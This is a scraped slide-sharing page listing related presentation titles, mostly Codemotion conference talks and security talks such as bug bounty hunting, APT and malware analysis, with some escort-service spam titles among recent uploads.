АтаĐșĐž ĐœĐ° ĐČĐžĐŽĐ”ĐŸĐșĐŸĐœĐČДртДры: ĐłĐŸĐŽ спустяАтаĐșĐž ĐœĐ° ĐČĐžĐŽĐ”ĐŸĐșĐŸĐœĐČДртДры: ĐłĐŸĐŽ спустя
АтаĐșĐž ĐœĐ° ĐČĐžĐŽĐ”ĐŸĐșĐŸĐœĐČДртДры: ĐłĐŸĐŽ спустяPositive Hack Days
 
BrightonSEO - ChatGPT-4 Localisation friend or foe FINAL.pptx
BrightonSEO - ChatGPT-4 Localisation friend or foe FINAL.pptxBrightonSEO - ChatGPT-4 Localisation friend or foe FINAL.pptx
BrightonSEO - ChatGPT-4 Localisation friend or foe FINAL.pptxJamesBall92
 
Solar winds supply chain breach - Insights from the trenches
Solar winds supply chain breach - Insights from the trenchesSolar winds supply chain breach - Insights from the trenches
Solar winds supply chain breach - Insights from the trenchesInfosec
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101Shahee Mirza
 
Bullshit, Own It: A Temperamental SEO's Guide To Getting Shit Done
Bullshit, Own It: A Temperamental SEO's Guide To Getting Shit DoneBullshit, Own It: A Temperamental SEO's Guide To Getting Shit Done
Bullshit, Own It: A Temperamental SEO's Guide To Getting Shit DoneIan Lurie
 
Deep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalDeep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalIsao Takaesu
 
A beginner's guide to machine learning for SEOs - WTSFest 2022
A beginner's guide to machine learning for SEOs - WTSFest 2022A beginner's guide to machine learning for SEOs - WTSFest 2022
A beginner's guide to machine learning for SEOs - WTSFest 2022LazarinaStoyanova
 
Smxl milan 2019 - Apps script for SEO
Smxl milan 2019 - Apps script for SEOSmxl milan 2019 - Apps script for SEO
Smxl milan 2019 - Apps script for SEODavid Sottimano
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security TeamSecrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security TeamOWASP Delhi
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
 
NY WebPerf Sept '22 - Performance Mistakes - An HTTP Archive Deep Dive
NY WebPerf Sept '22 - Performance Mistakes - An HTTP Archive Deep DiveNY WebPerf Sept '22 - Performance Mistakes - An HTTP Archive Deep Dive
NY WebPerf Sept '22 - Performance Mistakes - An HTTP Archive Deep DivePaul Calvano
 
API Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfAPI Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfVishwas N
 
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...ufpb
 

Was ist angesagt? (20)

Top 10 it specialist interview questions and answers
Top 10 it specialist interview questions and answersTop 10 it specialist interview questions and answers
Top 10 it specialist interview questions and answers
 
How to produce great multilingual content, even when you can't read it | Laur...
How to produce great multilingual content, even when you can't read it | Laur...How to produce great multilingual content, even when you can't read it | Laur...
How to produce great multilingual content, even when you can't read it | Laur...
 
The Game of Bug Bounty Hunting - Money, Drama, Action and Fame
The Game of Bug Bounty Hunting - Money, Drama, Action and FameThe Game of Bug Bounty Hunting - Money, Drama, Action and Fame
The Game of Bug Bounty Hunting - Money, Drama, Action and Fame
 
OWASP WTE - Now in the Cloud!
OWASP WTE - Now in the Cloud!OWASP WTE - Now in the Cloud!
OWASP WTE - Now in the Cloud!
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?
 
Bug Bounty - Hackers Job
Bug Bounty - Hackers JobBug Bounty - Hackers Job
Bug Bounty - Hackers Job
 
АтаĐșĐž ĐœĐ° ĐČĐžĐŽĐ”ĐŸĐșĐŸĐœĐČДртДры: ĐłĐŸĐŽ спустя
АтаĐșĐž ĐœĐ° ĐČĐžĐŽĐ”ĐŸĐșĐŸĐœĐČДртДры: ĐłĐŸĐŽ спустяАтаĐșĐž ĐœĐ° ĐČĐžĐŽĐ”ĐŸĐșĐŸĐœĐČДртДры: ĐłĐŸĐŽ спустя
АтаĐșĐž ĐœĐ° ĐČĐžĐŽĐ”ĐŸĐșĐŸĐœĐČДртДры: ĐłĐŸĐŽ спустя
 
BrightonSEO - ChatGPT-4 Localisation friend or foe FINAL.pptx
BrightonSEO - ChatGPT-4 Localisation friend or foe FINAL.pptxBrightonSEO - ChatGPT-4 Localisation friend or foe FINAL.pptx
BrightonSEO - ChatGPT-4 Localisation friend or foe FINAL.pptx
 
Solar winds supply chain breach - Insights from the trenches
Solar winds supply chain breach - Insights from the trenchesSolar winds supply chain breach - Insights from the trenches
Solar winds supply chain breach - Insights from the trenches
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101
 
Bullshit, Own It: A Temperamental SEO's Guide To Getting Shit Done
Bullshit, Own It: A Temperamental SEO's Guide To Getting Shit DoneBullshit, Own It: A Temperamental SEO's Guide To Getting Shit Done
Bullshit, Own It: A Temperamental SEO's Guide To Getting Shit Done
 
Deep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalDeep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 Arsenal
 
A beginner's guide to machine learning for SEOs - WTSFest 2022
A beginner's guide to machine learning for SEOs - WTSFest 2022A beginner's guide to machine learning for SEOs - WTSFest 2022
A beginner's guide to machine learning for SEOs - WTSFest 2022
 
Smxl milan 2019 - Apps script for SEO
Smxl milan 2019 - Apps script for SEOSmxl milan 2019 - Apps script for SEO
Smxl milan 2019 - Apps script for SEO
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security TeamSecrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
 
NY WebPerf Sept '22 - Performance Mistakes - An HTTP Archive Deep Dive
NY WebPerf Sept '22 - Performance Mistakes - An HTTP Archive Deep DiveNY WebPerf Sept '22 - Performance Mistakes - An HTTP Archive Deep Dive
NY WebPerf Sept '22 - Performance Mistakes - An HTTP Archive Deep Dive
 
API Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfAPI Testing and Hacking (1).pdf
API Testing and Hacking (1).pdf
 
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
 

Ähnlich wie The magic world of APT 0.6 - Pompili

Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Codemotion
 
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...Codemotion
 
Andrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware AnalysisAndrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware AnalysisCodemotion
 
Attacchi, bugie e underground digitale by Andrea Pompili
Attacchi, bugie e underground digitale by Andrea PompiliAttacchi, bugie e underground digitale by Andrea Pompili
Attacchi, bugie e underground digitale by Andrea PompiliCodemotion
 
Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)Codemotion
 
Pompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending storyPompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending storyCodemotion
 
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017Codemotion
 
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...Codemotion
 
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...Codemotion
 
Wearable botnets 201560319_v3
Wearable botnets 201560319_v3Wearable botnets 201560319_v3
Wearable botnets 201560319_v3Codemotion
 
Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?Codemotion
 
Web+proxy Posts - Page 1
Web+proxy Posts - Page 1Web+proxy Posts - Page 1
Web+proxy Posts - Page 1scientificcuff635
 
Application Security for the masses
Application Security for the massesApplication Security for the masses
Application Security for the massesCodemotion
 
Using Java to build robots with high schoolers
Using Java to build robots with high schoolersUsing Java to build robots with high schoolers
Using Java to build robots with high schoolersVMware Tanzu
 
WordPress Security - Learning From Hacks
WordPress Security - Learning From HacksWordPress Security - Learning From Hacks
WordPress Security - Learning From HacksTony Perez
 
Ignite java-robots
Ignite java-robotsIgnite java-robots
Ignite java-robotsJeanne Boyarsky
 
The Web Eats Everything In Its Path Fall 2014
The Web Eats Everything In Its Path Fall 2014The Web Eats Everything In Its Path Fall 2014
The Web Eats Everything In Its Path Fall 2014Tony Parisi
 
SpringOne2GX 2014 Splunk Presentation
SpringOne2GX 2014 Splunk PresentationSpringOne2GX 2014 Splunk Presentation
SpringOne2GX 2014 Splunk PresentationDamien Dallimore
 
Concourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOpsConcourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOpsVMware Tanzu
 
Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Nilesh Sapariya
 

Ähnlich wie The magic world of APT 0.6 - Pompili (20)

Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
 
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
 
Andrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware AnalysisAndrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware Analysis
 
Attacchi, bugie e underground digitale by Andrea Pompili
Attacchi, bugie e underground digitale by Andrea PompiliAttacchi, bugie e underground digitale by Andrea Pompili
Attacchi, bugie e underground digitale by Andrea Pompili
 
Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)
 
Pompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending storyPompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending story
 
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
 
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
 
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
 
Wearable botnets 201560319_v3
Wearable botnets 201560319_v3Wearable botnets 201560319_v3
Wearable botnets 201560319_v3
 
Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?
 
Web+proxy Posts - Page 1
Web+proxy Posts - Page 1Web+proxy Posts - Page 1
Web+proxy Posts - Page 1
 
Application Security for the masses
Application Security for the massesApplication Security for the masses
Application Security for the masses
 
Using Java to build robots with high schoolers
Using Java to build robots with high schoolersUsing Java to build robots with high schoolers
Using Java to build robots with high schoolers
 
WordPress Security - Learning From Hacks
WordPress Security - Learning From HacksWordPress Security - Learning From Hacks
WordPress Security - Learning From Hacks
 
Ignite java-robots
Ignite java-robotsIgnite java-robots
Ignite java-robots
 
The Web Eats Everything In Its Path Fall 2014
The Web Eats Everything In Its Path Fall 2014The Web Eats Everything In Its Path Fall 2014
The Web Eats Everything In Its Path Fall 2014
 
SpringOne2GX 2014 Splunk Presentation
SpringOne2GX 2014 Splunk PresentationSpringOne2GX 2014 Splunk Presentation
SpringOne2GX 2014 Splunk Presentation
 
Concourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOpsConcourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOps
 
Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015
 

Mehr von Codemotion

Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...Codemotion
 
Pastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storiaPastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storiaCodemotion
 
Pennisi - Essere Richard Altwasser
Pennisi - Essere Richard AltwasserPennisi - Essere Richard Altwasser
Pennisi - Essere Richard AltwasserCodemotion
 
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...Codemotion
 
Richard SĂŒselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard SĂŒselbeck - Building your own ride share app - Codemotion Amsterdam 2019Richard SĂŒselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard SĂŒselbeck - Building your own ride share app - Codemotion Amsterdam 2019Codemotion
 
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019Codemotion
 
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 - Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 - Codemotion
 
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...Codemotion
 
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...Codemotion
 
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...Codemotion
 
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...Codemotion
 
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019Codemotion
 
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019Codemotion
 
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019Codemotion
 
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...Codemotion
 
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...Codemotion
 
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019Codemotion
 
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019Codemotion
 
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019Codemotion
 
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...Codemotion
 

Mehr von Codemotion (20)

Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
 
Pastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storiaPastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storia
 
Pennisi - Essere Richard Altwasser
Pennisi - Essere Richard AltwasserPennisi - Essere Richard Altwasser
Pennisi - Essere Richard Altwasser
 
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
 
Richard SĂŒselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard SĂŒselbeck - Building your own ride share app - Codemotion Amsterdam 2019Richard SĂŒselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard SĂŒselbeck - Building your own ride share app - Codemotion Amsterdam 2019
 
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
 
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 - Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
 
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
 
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
 
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
 
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
 
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
 
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
 
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
 
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
 
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
 
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
 
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
 
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
 
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
 

KĂŒrzlich hochgeladen

Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...gurkirankumar98700
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel AraĂșjo
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
